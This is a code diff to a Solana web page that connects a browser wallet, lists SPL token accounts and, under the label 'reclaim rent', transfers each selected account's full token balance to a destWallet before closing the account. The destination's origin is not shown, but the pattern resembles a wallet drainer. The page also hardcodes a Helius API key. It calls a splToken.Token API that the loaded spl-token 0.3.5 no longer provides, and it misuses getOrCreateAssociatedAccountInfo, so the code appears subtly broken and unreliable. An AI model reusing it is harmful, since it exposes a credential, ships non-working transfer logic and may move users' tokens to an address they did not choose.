--- a/index.html
+++ b/index.html
@@ -54,13 +54,13 @@ th,td{border:1px solid #ccc;padding:8px;text-align:center}
 <div id="logs">Logs will appear here...</div>
 </div>
 
+<!-- Solana & SPL Token libraries -->
 <script src="https://cdn.jsdelivr.net/npm/@solana/web3.js@1.91.0/lib/index.iife.min.js"></script>
 <script src="https://cdn.jsdelivr.net/npm/@solana/spl-token@0.3.5/lib/index.iife.min.js"></script>
 
 <script>
 (async function() {
 const HELIUS_RPC = 'https://mainnet.helius-rpc.com/?api-key=b933e448-6fee-4016-b4ec-3c6c19a46775';
-const TOKEN_PROGRAM = splToken.TOKEN_PROGRAM_ID;
 const DUST_THRESHOLD_USD = 0.01;
 
 const walletDropdown = document.getElementById('walletDropdown');
@@ -102,11 +102,20 @@ function populateDropdown(){
     const div=document.createElement('div');
     div.className='option';
     div.innerHTML=`<img class="wallet-icon" src="${WALLET_ICONS[w.name]||''}"><span>${w.name}</span>`;
-    div.onclick=()=>{ selectedWalletObj=w; selectedEl.innerHTML=`<img class="wallet-icon" src="${WALLET_ICONS[w.name]||''}"><span>${w.name}</span>`; optionsEl.style.display='none';};
+    div.onclick=async ()=>{
+      selectedWalletObj=w;
+      selectedEl.innerHTML=`<img class="wallet-icon" src="${WALLET_ICONS[w.name]||''}"><span>${w.name}</span>`;
+      optionsEl.style.display='none';
+    };
     optionsEl.appendChild(div);
   });
 }
-selectedEl.parentElement.onclick=()=>{ optionsEl.style.display = optionsEl.style.display==='flex'?'none':'flex'; }
+
+selectedEl.parentElement.onclick=(e)=>{
+  e.stopPropagation();
+  optionsEl.style.display = optionsEl.style.display==='flex'?'none':'flex';
+}
+document.addEventListener('click',()=>{ optionsEl.style.display='none'; });
 
 function buildConnection(){ return new solanaWeb3.Connection(HELIUS_RPC,'confirmed'); }
 
@@ -129,21 +138,23 @@ async function connectWalletFunc(){
   if(!selectedWalletObj){ log('❌ Select a wallet first'); return; }
   try{
     log('Connecting ' + selectedWalletObj.name + '...');
-    const resp = await selectedWalletObj.wallet.connect();
-    publicKey = resp?.publicKey || selectedWalletObj.wallet?.publicKey;
-    if(publicKey?.toString) publicKey=publicKey.toString();
+    if(selectedWalletObj.name==='Phantom') await selectedWalletObj.wallet.connect();
+    if(selectedWalletObj.name==='Solflare') await selectedWalletObj.wallet.connect();
+    if(selectedWalletObj.name==='Slope') await selectedWalletObj.wallet.connect();
+
+    publicKey = selectedWalletObj.wallet.publicKey.toString();
     wallet = selectedWalletObj.wallet;
     log('✅ Connected: '+publicKey);
     if(!connection) connection=buildConnection();
 
-    // SOL
+    // SOL balance
     const lamports = await connection.getBalance(new solanaWeb3.PublicKey(publicKey));
     log('💰 SOL Balance: ' + (lamports/1e9).toFixed(6) + ' SOL');
 
-    // SPL
+    // SPL token accounts
     const tokenAccounts = await connection.getParsedTokenAccountsByOwner(
       new solanaWeb3.PublicKey(publicKey),
-      {programId: TOKEN_PROGRAM}
+      {programId: splToken.TOKEN_PROGRAM_ID}
     );
     const mints = tokenAccounts.value.map(t=>t.account.data.parsed.info.mint);
     const prices = await getTokenPrices(mints);
@@ -155,21 +166,24 @@ async function connectWalletFunc(){
       const amount=Number(info.tokenAmount.uiAmount);
       const usd=(amount*(prices[info.mint]||0)).toFixed(6);
       const row=document.createElement('tr');
-      row.innerHTML=`<td><input type="checkbox" data-pubkey="${t.pubkey.toString()}" data-mint="${info.mint}" data-amount="${amount}"></td>
+      row.innerHTML=`<td><input type="checkbox" data-pubkey="${t.pubkey}" data-mint="${info.mint}" data-amount="${amount}"></td>
                        <td>${info.mint}</td>
                        <td>${amount}</td>
                        <td>$${usd}</td>`;
       tokenTableBody.appendChild(row);
     });
     tokenTableContainer.style.display='block';
-
   } catch(e){ log('❌ Connect failed: '+e.message); }
 }
 
 async function disconnectWalletFunc(){
   if(!wallet){ log('❌ No wallet connected'); return; }
-  try{ if(wallet.disconnect) await wallet.disconnect(); log('Wallet disconnected'); wallet=null; publicKey=null; selectedWalletObj=null; tokenTableContainer.style.display='none';}
-  catch(e){ log('❌ Disconnect error: '+e.message);}
+  try{
+    if(wallet.disconnect) await wallet.disconnect();
+    wallet=null; publicKey=null; selectedWalletObj=null;
+    tokenTableContainer.style.display='none';
+    log('Wallet disconnected');
+  } catch(e){ log('❌ Disconnect error: '+e.message);}
 }
 
 async function reclaimRent(){
@@ -184,19 +198,19 @@ async function reclaimRent(){
   if(!checkboxes.length){ log('❌ Select token accounts to reclaim'); return; }
 
   for(const cb of checkboxes){
-    const tokenPub = new solanaWeb3.PublicKey(cb.dataset.pubkey);
     const mint = cb.dataset.mint;
     const amount = Number(cb.dataset.amount);
+    const tokenPub = new solanaWeb3.PublicKey(cb.dataset.pubkey);
 
     try{
-      const token = new splToken.Token(connection, mint, TOKEN_PROGRAM, wallet);
+      const token = new splToken.Token(connection, mint, splToken.TOKEN_PROGRAM_ID, wallet);
       const destTokenAccount = await token.getOrCreateAssociatedAccountInfo(new solanaWeb3.PublicKey(destWallet));
       const fromTokenAccount = await token.getOrCreateAssociatedAccountInfo(tokenPub);
 
       const tx = new solanaWeb3.Transaction();
       tx.add(
         splToken.Token.createTransferInstruction(
-          TOKEN_PROGRAM,
+          splToken.TOKEN_PROGRAM_ID,
           fromTokenAccount.address,
           destTokenAccount.address,
           new solanaWeb3.PublicKey(publicKey),
@@ -206,7 +220,7 @@ async function reclaimRent(){
       );
       tx.add(
         splToken.Token.createCloseAccountInstruction(
-          TOKEN_PROGRAM,
+          splToken.TOKEN_PROGRAM_ID,
           fromTokenAccount.address,
           new solanaWeb3.PublicKey(publicKey),
           new solanaWeb3.PublicKey(publicKey),
@@ -228,10 +242,8 @@ async function reclaimRent(){
 
       await connection.confirmTransaction(sig,'confirmed');
       log(`✅ Transferred & closed ${tokenPub.toString()} — tx ${sig}`);
-
     }catch(e){ log(`❌ Transfer/Close failed for ${tokenPub.toString()}: ${e?.message||e}`); }
   }
-
   log('🎉 Reclaim run complete.');
 }
 
@@ -240,9 +252,8 @@ disconnectBtn.addEventListener('click', disconnectWalletFunc);
 reclaimBtn.addEventListener('click', reclaimRent);
 
 connection = buildConnection();
-populateDropdown();
+setTimeout(populateDropdown, 500); // wait for wallets to inject
 setInterval(()=>{ if(detectWallets().length !== optionsEl.children.length) populateDropdown(); },3000);
-
 })();
 </script>
 </body>
